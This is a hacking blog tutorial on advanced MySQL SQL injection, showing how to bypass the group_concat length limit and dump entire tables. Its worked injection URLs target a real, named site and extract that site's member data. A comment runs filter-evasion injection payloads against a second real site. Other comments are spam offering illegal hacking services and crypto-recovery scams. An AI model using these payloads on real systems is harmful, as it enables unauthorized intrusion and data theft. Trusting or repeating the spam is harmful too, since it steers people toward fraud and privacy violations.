PART 1 - Advanced SQL Injection - Bypass 1024 Character Limit

[Image: Devil-2-icon.png]

Salam Visitor's.. 



When i started SQL Injection, at first, i used different tools like SQL Map etc .. (which is no doubt a very good tool) and i used to think, why don't people use these tools, why they prefer manual Injection.



Well .. the answer is simple. Lots of things you can do manually can never be done by these tools. Now I only use them when I'm doing Blind Injection.



So, I have decided to write a series of tutorials on SQL Injection from Medium to Advanced Level. There's nothing new from my side in these tutorials except the explanation (The Best i can do). I'm just posting what i have learnt. These threads/articles will be my creation. Not the methods but the threads



I have already posted a Basic Tutorial .. Check it here if you haven't checked it yet.



Adding HTML in SQL Injection ( SQLi FUN )





So, In this first part I'm going to show you guys:

[Image: SQL-tutorial.jpg]


1) How to Bypass 1024 character Limit of group_concat().

2) How to Dump a complete table using single query.





1) How to Bypass 1024 character Limit of group_concat():



Some functions in MySQL are limited to a character length of 1024 characters. Now, this limit can be increased only if you're a MySQL 'Root' User.

But, in our case we do not have the permissions to change these limits.

One of the very handy functions we use in our SQL Injection query is group_concat().

This function returns a string with concatenated non-NULL values from a group and by default it is also limited to a character length of 1024.



To demonstrate this whole scenario, I've chosen few targets. For this Example the target I'm going to use is:



hxxp://www.padaweb.org/about.php?cid=2



Here the parameter 'cid' is vulnerable to very simple SQL Injection.



By quickly evaluating the vulnerable columns, this is the query.



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+1,2,3,4--


[Image: t1.JPG]


The vulnerable columns are 1 and 2. Column 1 is in the title of the webpage, where as column 2 is on the webpage. Now i can Inject in Column 2. But just forthe sake of fun, I will inject in Column 1. But first i will use my previous tutorial called
" Adding HTML tags in SQL Injection "
to bring that column 1 from the title of the webpage to the main webpage. 



So, by looking at the source:

[Image: t2.JPG]



I know to bring this column on the webpage i have to close <title> tag as </title>. But as Magic Quotes are 'ON' so i have to convert my HTML tag to HEX first.



My query will be:


hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(</title>,database()),2,3,4--



[b]After converting </title> to HEX:

hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,database()),2,3,4--



And see the result now:

[Image: t3.JPG]

Now if you want to add some colors and stuff follow my previous tutorial.



Coming to the actual goal again, by quickly evaluating all the tables i have found an interesting table

here: tblMember in the main database: padaorg_pada



Lets get the column names of this table. The query will be:



Before Converting to HEX:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(</title>,group_concat(<br>,column_name)),2,3,4+from+information_schema.columns+where+table_name=tblMember--



I have to convert the HTML tags in HEX and tblMember to CHAR() as Magic Quotes are 'ON'.



so after converting:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,group_concat(0x3c62723e,column_nam​e)),2,3,4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 77, 101, 109, 98, 101, 114)--



[Image: t4.JPG]



Now, by looking at all the column names some one may think that these are all the column namesbut no, we have more, we couldn't dump them because of the1024 character limit.



By Using this query i can find no. of Columns in tblMember:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,count(column_name)),2,3,4+from+inf​ormation_schema.columns+where+table_name=CHAR(116, 98, 108, 77, 101, 109, 98, 101, 114)--


That is : 35 Rows of Data



[Image: t5.JPG]



so we are missing some columns here.



Lets do one more test. Lets grab the data in some of the columns.



This query will tell me, how many Entries or Rows are there in this table:


hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,count(*)),2,3,4+from+tblMember--



That is: 45 Rows of Data



[Image: t6.JPG]



Lets see how many do we get using group_concat():



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,group_concat(0x3c62723e,Member_Nam​e,0x3a,Date_Time_Created,0x3a,Date_Time_Modified)),2,3,4+from+tblMember--



That is: 18 Rows of Data



[Image: t7.JPG]



So, we are definitely missing some data here and you know the reason.



To bypass this we are going to use simple programming logic i.e Iterations. Take a look at this code:
PHP Code:
(
 select (@x)
 from (
 select (@x:=0x00),
            (
 select (0)
 from (information_schema.columns)
 where (table_schema!='information_schema') and (0x00)
            in (@x:=concat(@x,'<br>',table_schema,'-->',table_name,'-->',column_name))
 )
 )x

Yea .. i know it looks horrible .. Tongue .. but don't worry .. this piece of code will do wonders for us. Let me explain what's happening here.

Warning : IF you have a Weak Heart, Leave this thread at this very moment Tongue



So, we are declaring a variable 'x' here and with the help of nested SELECT statement we will iterate through each and every Table Name and Column name of all the databases available except for 'information_schema' which is not required as it just gives access to the MetaData of the databases and thus all the Column names will be printed with their respective Table names.



I will put this whole code in my SQL Injection query in my vulnerable Column i.e column 1.



Lets try this. My Query will become:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@x:=concat(@x,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)),2,3,4--



But this will NOT work .. Big Grin why? because magic quotes are 'ON'. we have to do some Hexing here.



So after Hexing:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name)​)))x)),2,3,4--



[Image: t8.JPG]



Lets add some Colors to it Tongue (Be Nice Plz, I know This Query will be HUGE) :



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d2272656422​3e,table_schema,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e742073697a653d22342220636f6c​6f723d22677265656e223e,table_name,0x3c2f666f6e743e,0x2d2d3e3c666f6e7420636f6c6f7​23d22626c7565223e,column_name))))x)),2,3,4--



Check the result ( SWEET Big Grin ) :



[Image: t9.JPG]





2) How to Dump a complete table in one go.



So, after all this, there must be a way to dump a whole table (Data in all Columns) with one Single Query. We are going to use a similar code again but with littlemodification.


PHP Code:
(
 select (@)
 from (
 select (@:=0x00),
           (
 select (@)
 from TABLE_NAME_HERE
 where (@) in (@:=concat(@,'<br>',FIRST_COLUMN_HERE,'-->',SECOND_COLUMN_HERE,'-->',AND_SO_ON))
           )

     )a


Lets try this. By using this whole code in our Query:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@) from (select (@:=0x00), (select (@) from tblMember where (@) in (@:=concat(@,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d22726564223e​,Member_Name,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e742073697a653d22342220636f6c6f7​23d22677265656e223e,Date_Time_Created,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e742063​6f6c6f723d22626c7565223e,Date_Time_Modified,0x3c2f666f6e743e))))a)),2,3,4--





[Image: t10.JPG]



That is : 45 Big Grin ( Which was previously 18 using group_concat)







That's it for the day..The Best SQL Injectors I've ever known .. I hope this was informative .. Thank you so much for reading one of the longest threads Tongue


NOTE: If you copy paste these links from here into your browser tab, make sure to paste it in notepad first and delete these bugs .. 



[Image: bug.JPG]

these Bugs Appear because when we copy paste directly from blog thread page, we also copy some unicode characters like this zero width space &'#8203;which when comes in a query doesn't show the results properly .. 

About The Author

Salman Rafiq
Salman Rafiq is the Founder of 'My Basic Tricks'. I am a Security Researcher and Ethical Hacker, with experience in various aspects of Information Security and Other then I am SEO expert and a Blogger. My all efforts is to make internet more Security..

13 comments:

  1. لا اله الا الله محمد رسول اللهNovember 13, 2013 at 7:27 PM

    salam bro
    yes yes LOool
    Only this strongest explanation banner and it is very new ways
    But I noticed that commands very large and complex hhh ok oky
    some novices Brotherhood will not understand..so MY RATING you 10/10 very good
    See here
    This is an Islamist Web site but will only try it....just traineeship oky?
    http://www.gazelles.ma/produit.php?cat=60& id=2'
    http://www.gazelles.ma/produit.php?cat=60& id=2 +order+by 1,2222,3,4 --
    http://www.gazelles.ma/produit.php?cat=60& id=-2 +union+select+ 1,2222,3,4 --
    Here can not control ..union+select ..
    +and+0+/*!50000Union*/+/*!50000select*/+
    Or thiS
    +and+0+/*!12345Union*/+/*!12345select*/+
    Or this but here Stop but if he refuses selct and union..!
    +and+0+(/*!NIUnionEN*/)+(/*!SELselectECT*/)+
    http://www.gazelles.ma/produit.php?cat=60& id=/*!-2 +unionUnion+selectSelect+ 1,2222,3,4 --
    In each case the result appeared ..
    http://www.gazelles.ma/produit.php?cat=60&id=-2+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000CONCAT(Column_Name,0x3e,Table_Schema,0x3e,table_Name)*/)),3,4+/*!50000FROM*/Information_Schema.Columns limit 552,1--
    look here limit table 552,1 not 1 ..2 or 5 just 552
    admin_id>gaz8_bd>admin
    admin_login>gaz8_bd>admin
    admin_pass>gaz8_bd>admin
    The end result
    my question now is How can coded like with these orders?
    I'm sorry for bad language..

    ReplyDelete
    Replies
    1. WebbDecember 11, 2019 at 12:35 PM

      DO YOU NEED A PROFESSIONAL HACKER?

      Hiring a hacker these days is a bit difficult because lots of people fall for scams. Does that mean there aren't real hackers online? NO definitely!!

      We prove ourselves beyond reasonable doubts on all Hacking jobs. Be sure you are making the right decision. Don't just make payment without knowing what approach specifically. You need a professional hacker?

      We have a list of hackers on our platform of which we will recommend to you after you contact us:

      1. Alexander D.

      Specialties: Ethical Hacker, Penetration Tester and Malware Removal Expert: Information Security, Network Security, Penetration Testing, Internet Security bypass, Vulnerability Assessment, Wireless Security bypass, and Website hacking.

      Country: Ukraine

      $35/hr

      2. Adrian R.

      Specialties: Experienced Manager and Penetration Tester with a DevSecOps Background: Network Security, Penetration Testing, Linux System Administration, Python, Product Management, Project Management, Windows Administration.

      Country: United States

      $50/hr

      3. Matthew M.

      Professional Penetration Tester & Information Security Expert

      Specialties :Information Security, Network Security, Penetration Testing, Security Analysis, Internet Security, Digital Forensics, Ethical Hacking, Web Application Security.

      Country: United States

      $120/hr

      4. Micheal K.

      Specialties: Penetration Tester (Ethical Hacker):
      Network Security, Network Pentesting, Network Monitoring.

      Country: United states.

      $150/hr

      And a lot of other team members to be mentioned.

      Be safe out there!

      YOU CAN CONTACT US AT
      Email: contracthacks@gmail.com
      303 Second St., Suite 900 South Tower,
      San Francisco, CA 94107

      Delete
    2. WebbDecember 11, 2019 at 12:36 PM

      BITCOIN WALLETS SUPPORT TEAM

      DO YOU KNOW that there are thousands of "Request Tickets" sent every single day to support teams on bitcoin trading platforms? For example; COINBASE, BLOCKCHAIN, PAXFUL, REMITANO, LUNO, HITBTC, BINANCE, LOCALBITCOINS, KPAKEN, BITFINEX and so many more!
      Now how do you expect them to answer you in few minutes and solve your problems 100%?!
      How long will you wait?

      Today's support team on different bitcoin trading platforms are not completely reliable as you will be told to hold on and you will be attended to probably after a month because there are thousands of customers to attend to.


      On different platforms of bitcoin trading, a team of professional hackers came together on contract to provide swift help to Bitcoin traders having any issues with their accounts which were not attended to by their Support Team on their trading platform.


      The purpose of this team is to manage customer queries by using the RIGHT TOOLS we need to delight our customers without compromising on quality in order not to make customers feel challenged to gain our assistance!

      Our team support doesn't stop at asking mere questions. They take your feedback, mix it with some crypto insights and turn it into a better experience for our users every single day!

      LOST ID OR PASSWORD
      SMARTPHONE HACKING
      DELETED MESSAGES
      CLEARING OF CRIMINAL RECORDS
      LOST EMAIL ACCOUNTS
      LOST FACEBOOK ACCOUNTS
      HACKED ACCOUNT RECOVERY
      STOLEN BITCOINS
      PHISHING OF BITCOIN ACCOUNT
      LOGIN ERRORS
      SCAM DURING BITCOIN TRADINGS

      And any other issue can be resolved by us without stress. Chat with us. Thousands of customer issues are resolved within minutes every day!

      For the fastest resolution to all issues, please contact our Support Center prior to submitting a request.

      To assist us in resolving your issue as quickly as possible, please provide specific information such as digital currency addresses, payment codes, or the exact error message displayed!

      Contact our support team for further assistance:
      Cryptoteamsupport@protonmail.com
      Contracthacks@gmail.com
      Hacktech@hackermail.com
      303 Second St., Suite 900 South Tower,
      San Francisco, CA 94107

      Delete
    3. AnonymousMarch 30, 2022 at 8:32 AM

      My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download Now

      >>>>> Download Full

      My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download LINK

      >>>>> Download Now

      My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download Full

      >>>>> Download LINK ru

      Delete
  2. AnonymousNovember 16, 2016 at 10:34 AM

    Hello everyone, I have tried blackhatservers@gmail.com and i have confirmed her good work among all of this hackers out there ,she helped me hack my cheating partner whatsapp, facebook and cell phone number. I listened to all his calls and I was able to get good evidence for my attorney for divorce. It was really a big surprise to me but glad I gave a try. Contact her for similar issues on blackhatservers@gmail.com and
    consider your big problem solved

    ReplyDelete
  3. mia santanaSeptember 9, 2017 at 3:58 PM

    I dont really know much about hacking after so many tries i met Cyberhacking lord who later help me find out my husband has been cheating on me and stealing from my bank account, he had this scheme going for 6 months. He gave me access to his mail,social media account,phone(could see deleted messages) and even track his location, still going to sue to him. Having doubts in your relationship? contact him (cyberhackinglord@gmail.com)

    ReplyDelete
  4. BrackettjamesSeptember 3, 2019 at 11:59 PM

    CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?
    Strengthen your Cybersecurity stance by contacting ALEXGHACKLORD,HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the Best hands to getting your Cyber Hack needs met
    We specialize in All type of cyber Jobs such as:
    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.
    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.
    #INSTALLATION of Spy ware so as to spy into someone else’s computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.
    #CRACKING into Websites, CCTV Survelance camera, Data base etc, of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c
    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.
    * We assure you that your Job will be attended to with care and efficiency as it will be handled with the Best professional hands in Cyber Hack business.
    #We also have a forum where you can get yourself equipped with Advanced hacking skills
    And if you’re Good with Hacking and you think you can Join our Team of SOPHISTICATED HACKERS, you’re welcome as well…
    CLASSIC CYBER HACKS gives you the Best service in the Hacking world.
    * We’re Classic Hacks *
    Write us on:
    *ALEXGHACKLORD@GMAIL. COM
    Signed,
    Brackett

    ReplyDelete
  5. AnonymousApril 20, 2020 at 2:58 PM

    Get in touch with jeajamhacker@gmail.com if you have problems with your spouse cheating on you cause this is the only solution you need in getting a lot of proof from your spouse phone, jeajamhacker is reliable and affordable he has been the one working for me before i got married. With this hacker i was able to detect the good and bad from my past relationship cause i was always catching my ex girl friends red handed. This hacker is powerful and i trust him with my life that he will help you Thanks.

    ReplyDelete
  6. AlvirMay 24, 2020 at 8:15 PM

    I never thought I will come in contact with a real and potential hacker until I knew   brillianthackers800 at Gmail and he delivered a professional job,he is intelligent and understanding to control jobs that comes his way
    You can message on his number +1(385) 2501115,
    Contact him and be happy

    ReplyDelete
  7. ElizabethSeptember 29, 2020 at 12:53 PM

    I was so anxiuos to know what my husband was always doing late outside the house so i started contacting hackers and was scamed severly until i almost gave up then i contacted this one hacker and he delivered a good job showing evidences i needed from the apps on his phone like whatsapp,facebook,instagram and others and i went ahead to file my divorce papers with the evidences i got,He also went ahead to get me back some of my lost money i sent to those other fake hackers,every dollar i spent on these jobs was worth it.Contact him so he also help you.
    mail: premiumhackservices@gmail.com
    text or call +1 4016006790

    ReplyDelete
  8. RICHARD J SMITHJanuary 24, 2022 at 8:09 PM

    These set of superior Cyber terrorist Known as WhitehatstechAtgmailDotcom have been in service for more than a decade and they have set an extremely impressive records that no Hacker can break,  they have the best hacking tools any one can ever imagine. I prefer to let their work speak for itself if interested in getting your credit score increased, erasing DUI, breaking into credit bureaus, clearing bankrupcies, student loans, credit cards loans, phone hack or spy and many more! The WHITECOLLARS are the best in what they do and I am happy they are here to help the world. Email them or communicate with them via Whitehatstech@gmail.com or WhatApp +18189256165 and thank me later

    ReplyDelete
  9. AnonymousMarch 30, 2022 at 8:32 AM

    My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download Now

    >>>>> Download Full

    My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download LINK

    >>>>> Download Now

    My Basic Tricks: Part 1 - Advanced Sql Injection - Bypass 1024 Character Limit >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  10. Carmel PhilipsOctober 27, 2023 at 11:31 AM

    Crypto Currency’s has been the general direction of the economic development which individuals like to save up with instead of banks. I lost my bitcoin to fake blockchain impostors on Facebook when they contacted me as blockchain official support and I fell for their mischievous act. Whatever information I gave them, made them gain access into my blockchain wallet and made away with my $155,000. I lost it and almost in a comma because this were all my savings waiting for bitcoin rate to improve. I wrote directly to the specialist whom I was referred to by my sister-in-law ( softwarespecialist@usa.com) explaining my loss. He helped me recover my crypto in just after 3 days and he as well helped me launch the recovery program all thanks to his expertise. I believe that someone out there will need his great services that is why I am referring him to someone. Reach out to the recovery specialist to recover you lost funds from any form of online.

    ReplyDelete

Subscribe to: Post Comments (Atom)
Copyright © 2013 My Basic Tricks and Salman Rafiq.